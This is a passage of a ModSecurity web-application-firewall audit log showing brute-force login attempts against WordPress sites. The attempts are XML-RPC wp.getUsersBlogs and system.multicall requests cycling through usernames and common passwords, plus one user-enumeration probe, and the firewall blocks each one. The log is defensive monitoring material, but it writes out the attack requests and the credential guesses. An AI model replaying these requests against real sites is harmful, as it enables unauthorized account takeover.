alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122031967515 5295 (- - -) Stopwatch2: 1749122031967515 5295; combined=3728, p1=451, p2=3107, p3=0, p4=0, p5=100, sr=88, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c398809-Z-- --e880d201-A-- [05/Jun/2025:18:14:51 +0700] aEF8K3-K7ToMdu-YSIJWfwAAAAs 103.236.140.4 56726 103.236.140.4 8181 --e880d201-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e880d201-C-- wp.getUsersBlogs miswan Administrator12 --e880d201-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e880d201-E-- --e880d201-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122091410523 3855 (- - -) Stopwatch2: 1749122091410523 3855; combined=2603, p1=343, p2=2145, p3=0, p4=0, p5=68, sr=61, sw=47, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e880d201-Z-- --a971dd11-A-- [05/Jun/2025:18:15:51 +0700] aEF8Z1wdJdhOudw5hdz-WAAAAJQ 103.236.140.4 56910 103.236.140.4 8181 --a971dd11-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a971dd11-C-- wp.getUsersBlogs miswan 1qaz@2wsx --a971dd11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a971dd11-E-- --a971dd11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (86+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122151021886 4240 (- - -) Stopwatch2: 1749122151021886 4240; combined=3313, p1=361, p2=2788, p3=0, p4=0, p5=96, sr=78, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a971dd11-Z-- --e1d4aa08-A-- [05/Jun/2025:18:16:51 +0700] aEF8o3-K7ToMdu-YSIJW-QAAABg 103.236.140.4 57076 103.236.140.4 8181 --e1d4aa08-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 215 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --e1d4aa08-C-- wp.getUsersBlogs miswan 999 --e1d4aa08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1d4aa08-E-- --e1d4aa08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122211625317 5819 (- - -) Stopwatch2: 1749122211625317 5819; combined=3999, p1=518, p2=3290, p3=0, p4=0, p5=112, sr=86, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1d4aa08-Z-- --2218d87c-A-- [05/Jun/2025:18:17:08 +0700] aEF8tOth7G2xELALzPZcngAAANc 103.236.140.4 57118 103.236.140.4 8181 --2218d87c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.239.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.239.90 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2218d87c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2218d87c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122228598394 3241 (- - -) Stopwatch2: 1749122228598394 3241; combined=1414, p1=490, p2=892, p3=0, p4=0, p5=32, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2218d87c-Z-- --b51bc868-A-- [05/Jun/2025:18:17:53 +0700] aEF84eth7G2xELALzPZcrwAAAMs 103.236.140.4 57182 103.236.140.4 8181 --b51bc868-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 216 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --b51bc868-C-- wp.getUsersBlogs miswan zzzz --b51bc868-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b51bc868-E-- --b51bc868-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (37+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122273709031 4267 (- - -) Stopwatch2: 1749122273709031 4267; combined=3249, p1=372, p2=2709, p3=0, p4=0, p5=98, sr=95, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b51bc868-Z-- --a1c50c57-A-- [05/Jun/2025:18:18:54 +0700] aEF9Hn-K7ToMdu-YSIJXDgAAABE 103.236.140.4 57318 103.236.140.4 8181 --a1c50c57-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a1c50c57-C-- wp.getUsersBlogs miswan 123112233 --a1c50c57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1c50c57-E-- --a1c50c57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122334668724 34989 (- - -) Stopwatch2: 1749122334668724 34989; combined=61533, p1=554, p2=3567, p3=0, p4=0, p5=28723, sr=99, sw=82, l=0, gc=28607 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1c50c57-Z-- --fa2e1e36-A-- [05/Jun/2025:18:18:56 +0700] aEF9IH-K7ToMdu-YSIJXEQAAAAA 103.236.140.4 57326 103.236.140.4 8181 --fa2e1e36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fa2e1e36-C-- wp.getUsersBlogs miswan 1234%^&* --fa2e1e36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa2e1e36-E-- --fa2e1e36-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122336783778 4946 (- - -) Stopwatch2: 1749122336783778 4946; combined=3643, p1=464, p2=2953, p3=0, p4=0, p5=137, sr=82, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa2e1e36-Z-- --c729e94c-A-- [05/Jun/2025:18:19:58 +0700] aEF9XirHpfaS2Cuwh8UJrQAAAFc 103.236.140.4 57500 103.236.140.4 8181 --c729e94c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --c729e94c-C-- wp.getUsersBlogs miswan monkey --c729e94c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c729e94c-E-- --c729e94c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (79+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122398074864 5161 (- - -) Stopwatch2: 1749122398074864 5161; combined=3700, p1=420, p2=3089, p3=0, p4=0, p5=110, sr=83, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c729e94c-Z-- --4d4d3064-A-- [05/Jun/2025:18:20:58 +0700] aEF9mirHpfaS2Cuwh8UJ0QAAAEU 103.236.140.4 57648 103.236.140.4 8181 --4d4d3064-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4d4d3064-C-- wp.getUsersBlogs miswan familia --4d4d3064-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d4d3064-E-- --4d4d3064-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (62+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122458932219 5576 (- - -) Stopwatch2: 1749122458932219 5576; combined=3710, p1=492, p2=3037, p3=0, p4=0, p5=108, sr=87, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d4d3064-Z-- --de9d1323-A-- [05/Jun/2025:18:21:25 +0700] aEF9tSrHpfaS2Cuwh8UJ6QAAAEQ 103.236.140.4 57720 103.236.140.4 8181 --de9d1323-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --de9d1323-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadminlws --de9d1323-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de9d1323-E-- --de9d1323-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122485113472 4407 (- - -) Stopwatch2: 1749122485113472 4407; combined=3407, p1=360, p2=2888, p3=0, p4=0, p5=94, sr=78, sw=65, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de9d1323-Z-- --fa2e1e36-A-- [05/Jun/2025:18:21:58 +0700] aEF91irHpfaS2Cuwh8UJ9gAAAEw 103.236.140.4 57812 103.236.140.4 8181 --fa2e1e36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --fa2e1e36-C-- wp.getUsersBlogs miswan 20100728 --fa2e1e36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa2e1e36-E-- --fa2e1e36-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122518258857 4738 (- - -) Stopwatch2: 1749122518258857 4738; combined=3574, p1=419, p2=2924, p3=0, p4=0, p5=130, sr=87, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa2e1e36-Z-- --105e1d12-A-- [05/Jun/2025:18:22:58 +0700] aEF-EirHpfaS2Cuwh8UKHQAAAEc 103.236.140.4 57944 103.236.140.4 8181 --105e1d12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --105e1d12-C-- wp.getUsersBlogs miswan peaches --105e1d12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --105e1d12-E-- --105e1d12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (54+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122578345743 4339 (- - -) Stopwatch2: 1749122578345743 4339; combined=3319, p1=356, p2=2782, p3=0, p4=0, p5=104, sr=80, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --105e1d12-Z-- --9d10417d-A-- [05/Jun/2025:18:23:10 +0700] aEF-Huth7G2xELALzPZdEwAAANc 103.236.140.4 57994 103.236.140.4 8181 --9d10417d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9d10417d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehTashi1234$ --9d10417d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d10417d-E-- --9d10417d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (3+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749122590286258 4773 (- - -) Stopwatch2: 1749122590286258 4773; combined=3597, p1=399, p2=3026, p3=0, p4=0, p5=101, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d10417d-Z-- --f869704f-A-- [05/Jun/2025:18:23:58 +0700] aEF-TirHpfaS2Cuwh8UKcgAAAEY 103.236.140.4 58144 103.236.140.4 8181 --f869704f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --f869704f-C-- wp.getUsersBlogs miswan gerrard8 --f869704f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f869704f-E-- --f869704f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (89+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122638135895 4203 (- - -) Stopwatch2: 1749122638135895 4203; combined=3249, p1=390, p2=2696, p3=0, p4=0, p5=95, sr=82, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f869704f-Z-- --a8342c13-A-- [05/Jun/2025:18:24:58 +0700] aEF-iirHpfaS2Cuwh8UKkAAAAFY 103.236.140.4 58300 103.236.140.4 8181 --a8342c13-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --a8342c13-C-- wp.getUsersBlogs kresno 1234567890 --a8342c13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8342c13-E-- --a8342c13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749122698079997 4027 (- - -) Stopwatch2: 1749122698079997 4027; combined=3127, p1=343, p2=2630, p3=0, p4=0, p5=90, sr=74, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8342c13-Z-- --ce44b100-A-- [05/Jun/2025:18:26:13 +0700] aEF-1X-K7ToMdu-YSIJXSQAAABY 103.236.140.4 58482 103.236.140.4 8181 --ce44b100-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --ce44b100-C-- wp.getUsersBlogs kresno kresno1997 --ce44b100-F-- HTTP/1.1 403 Forbidden Content-Length: 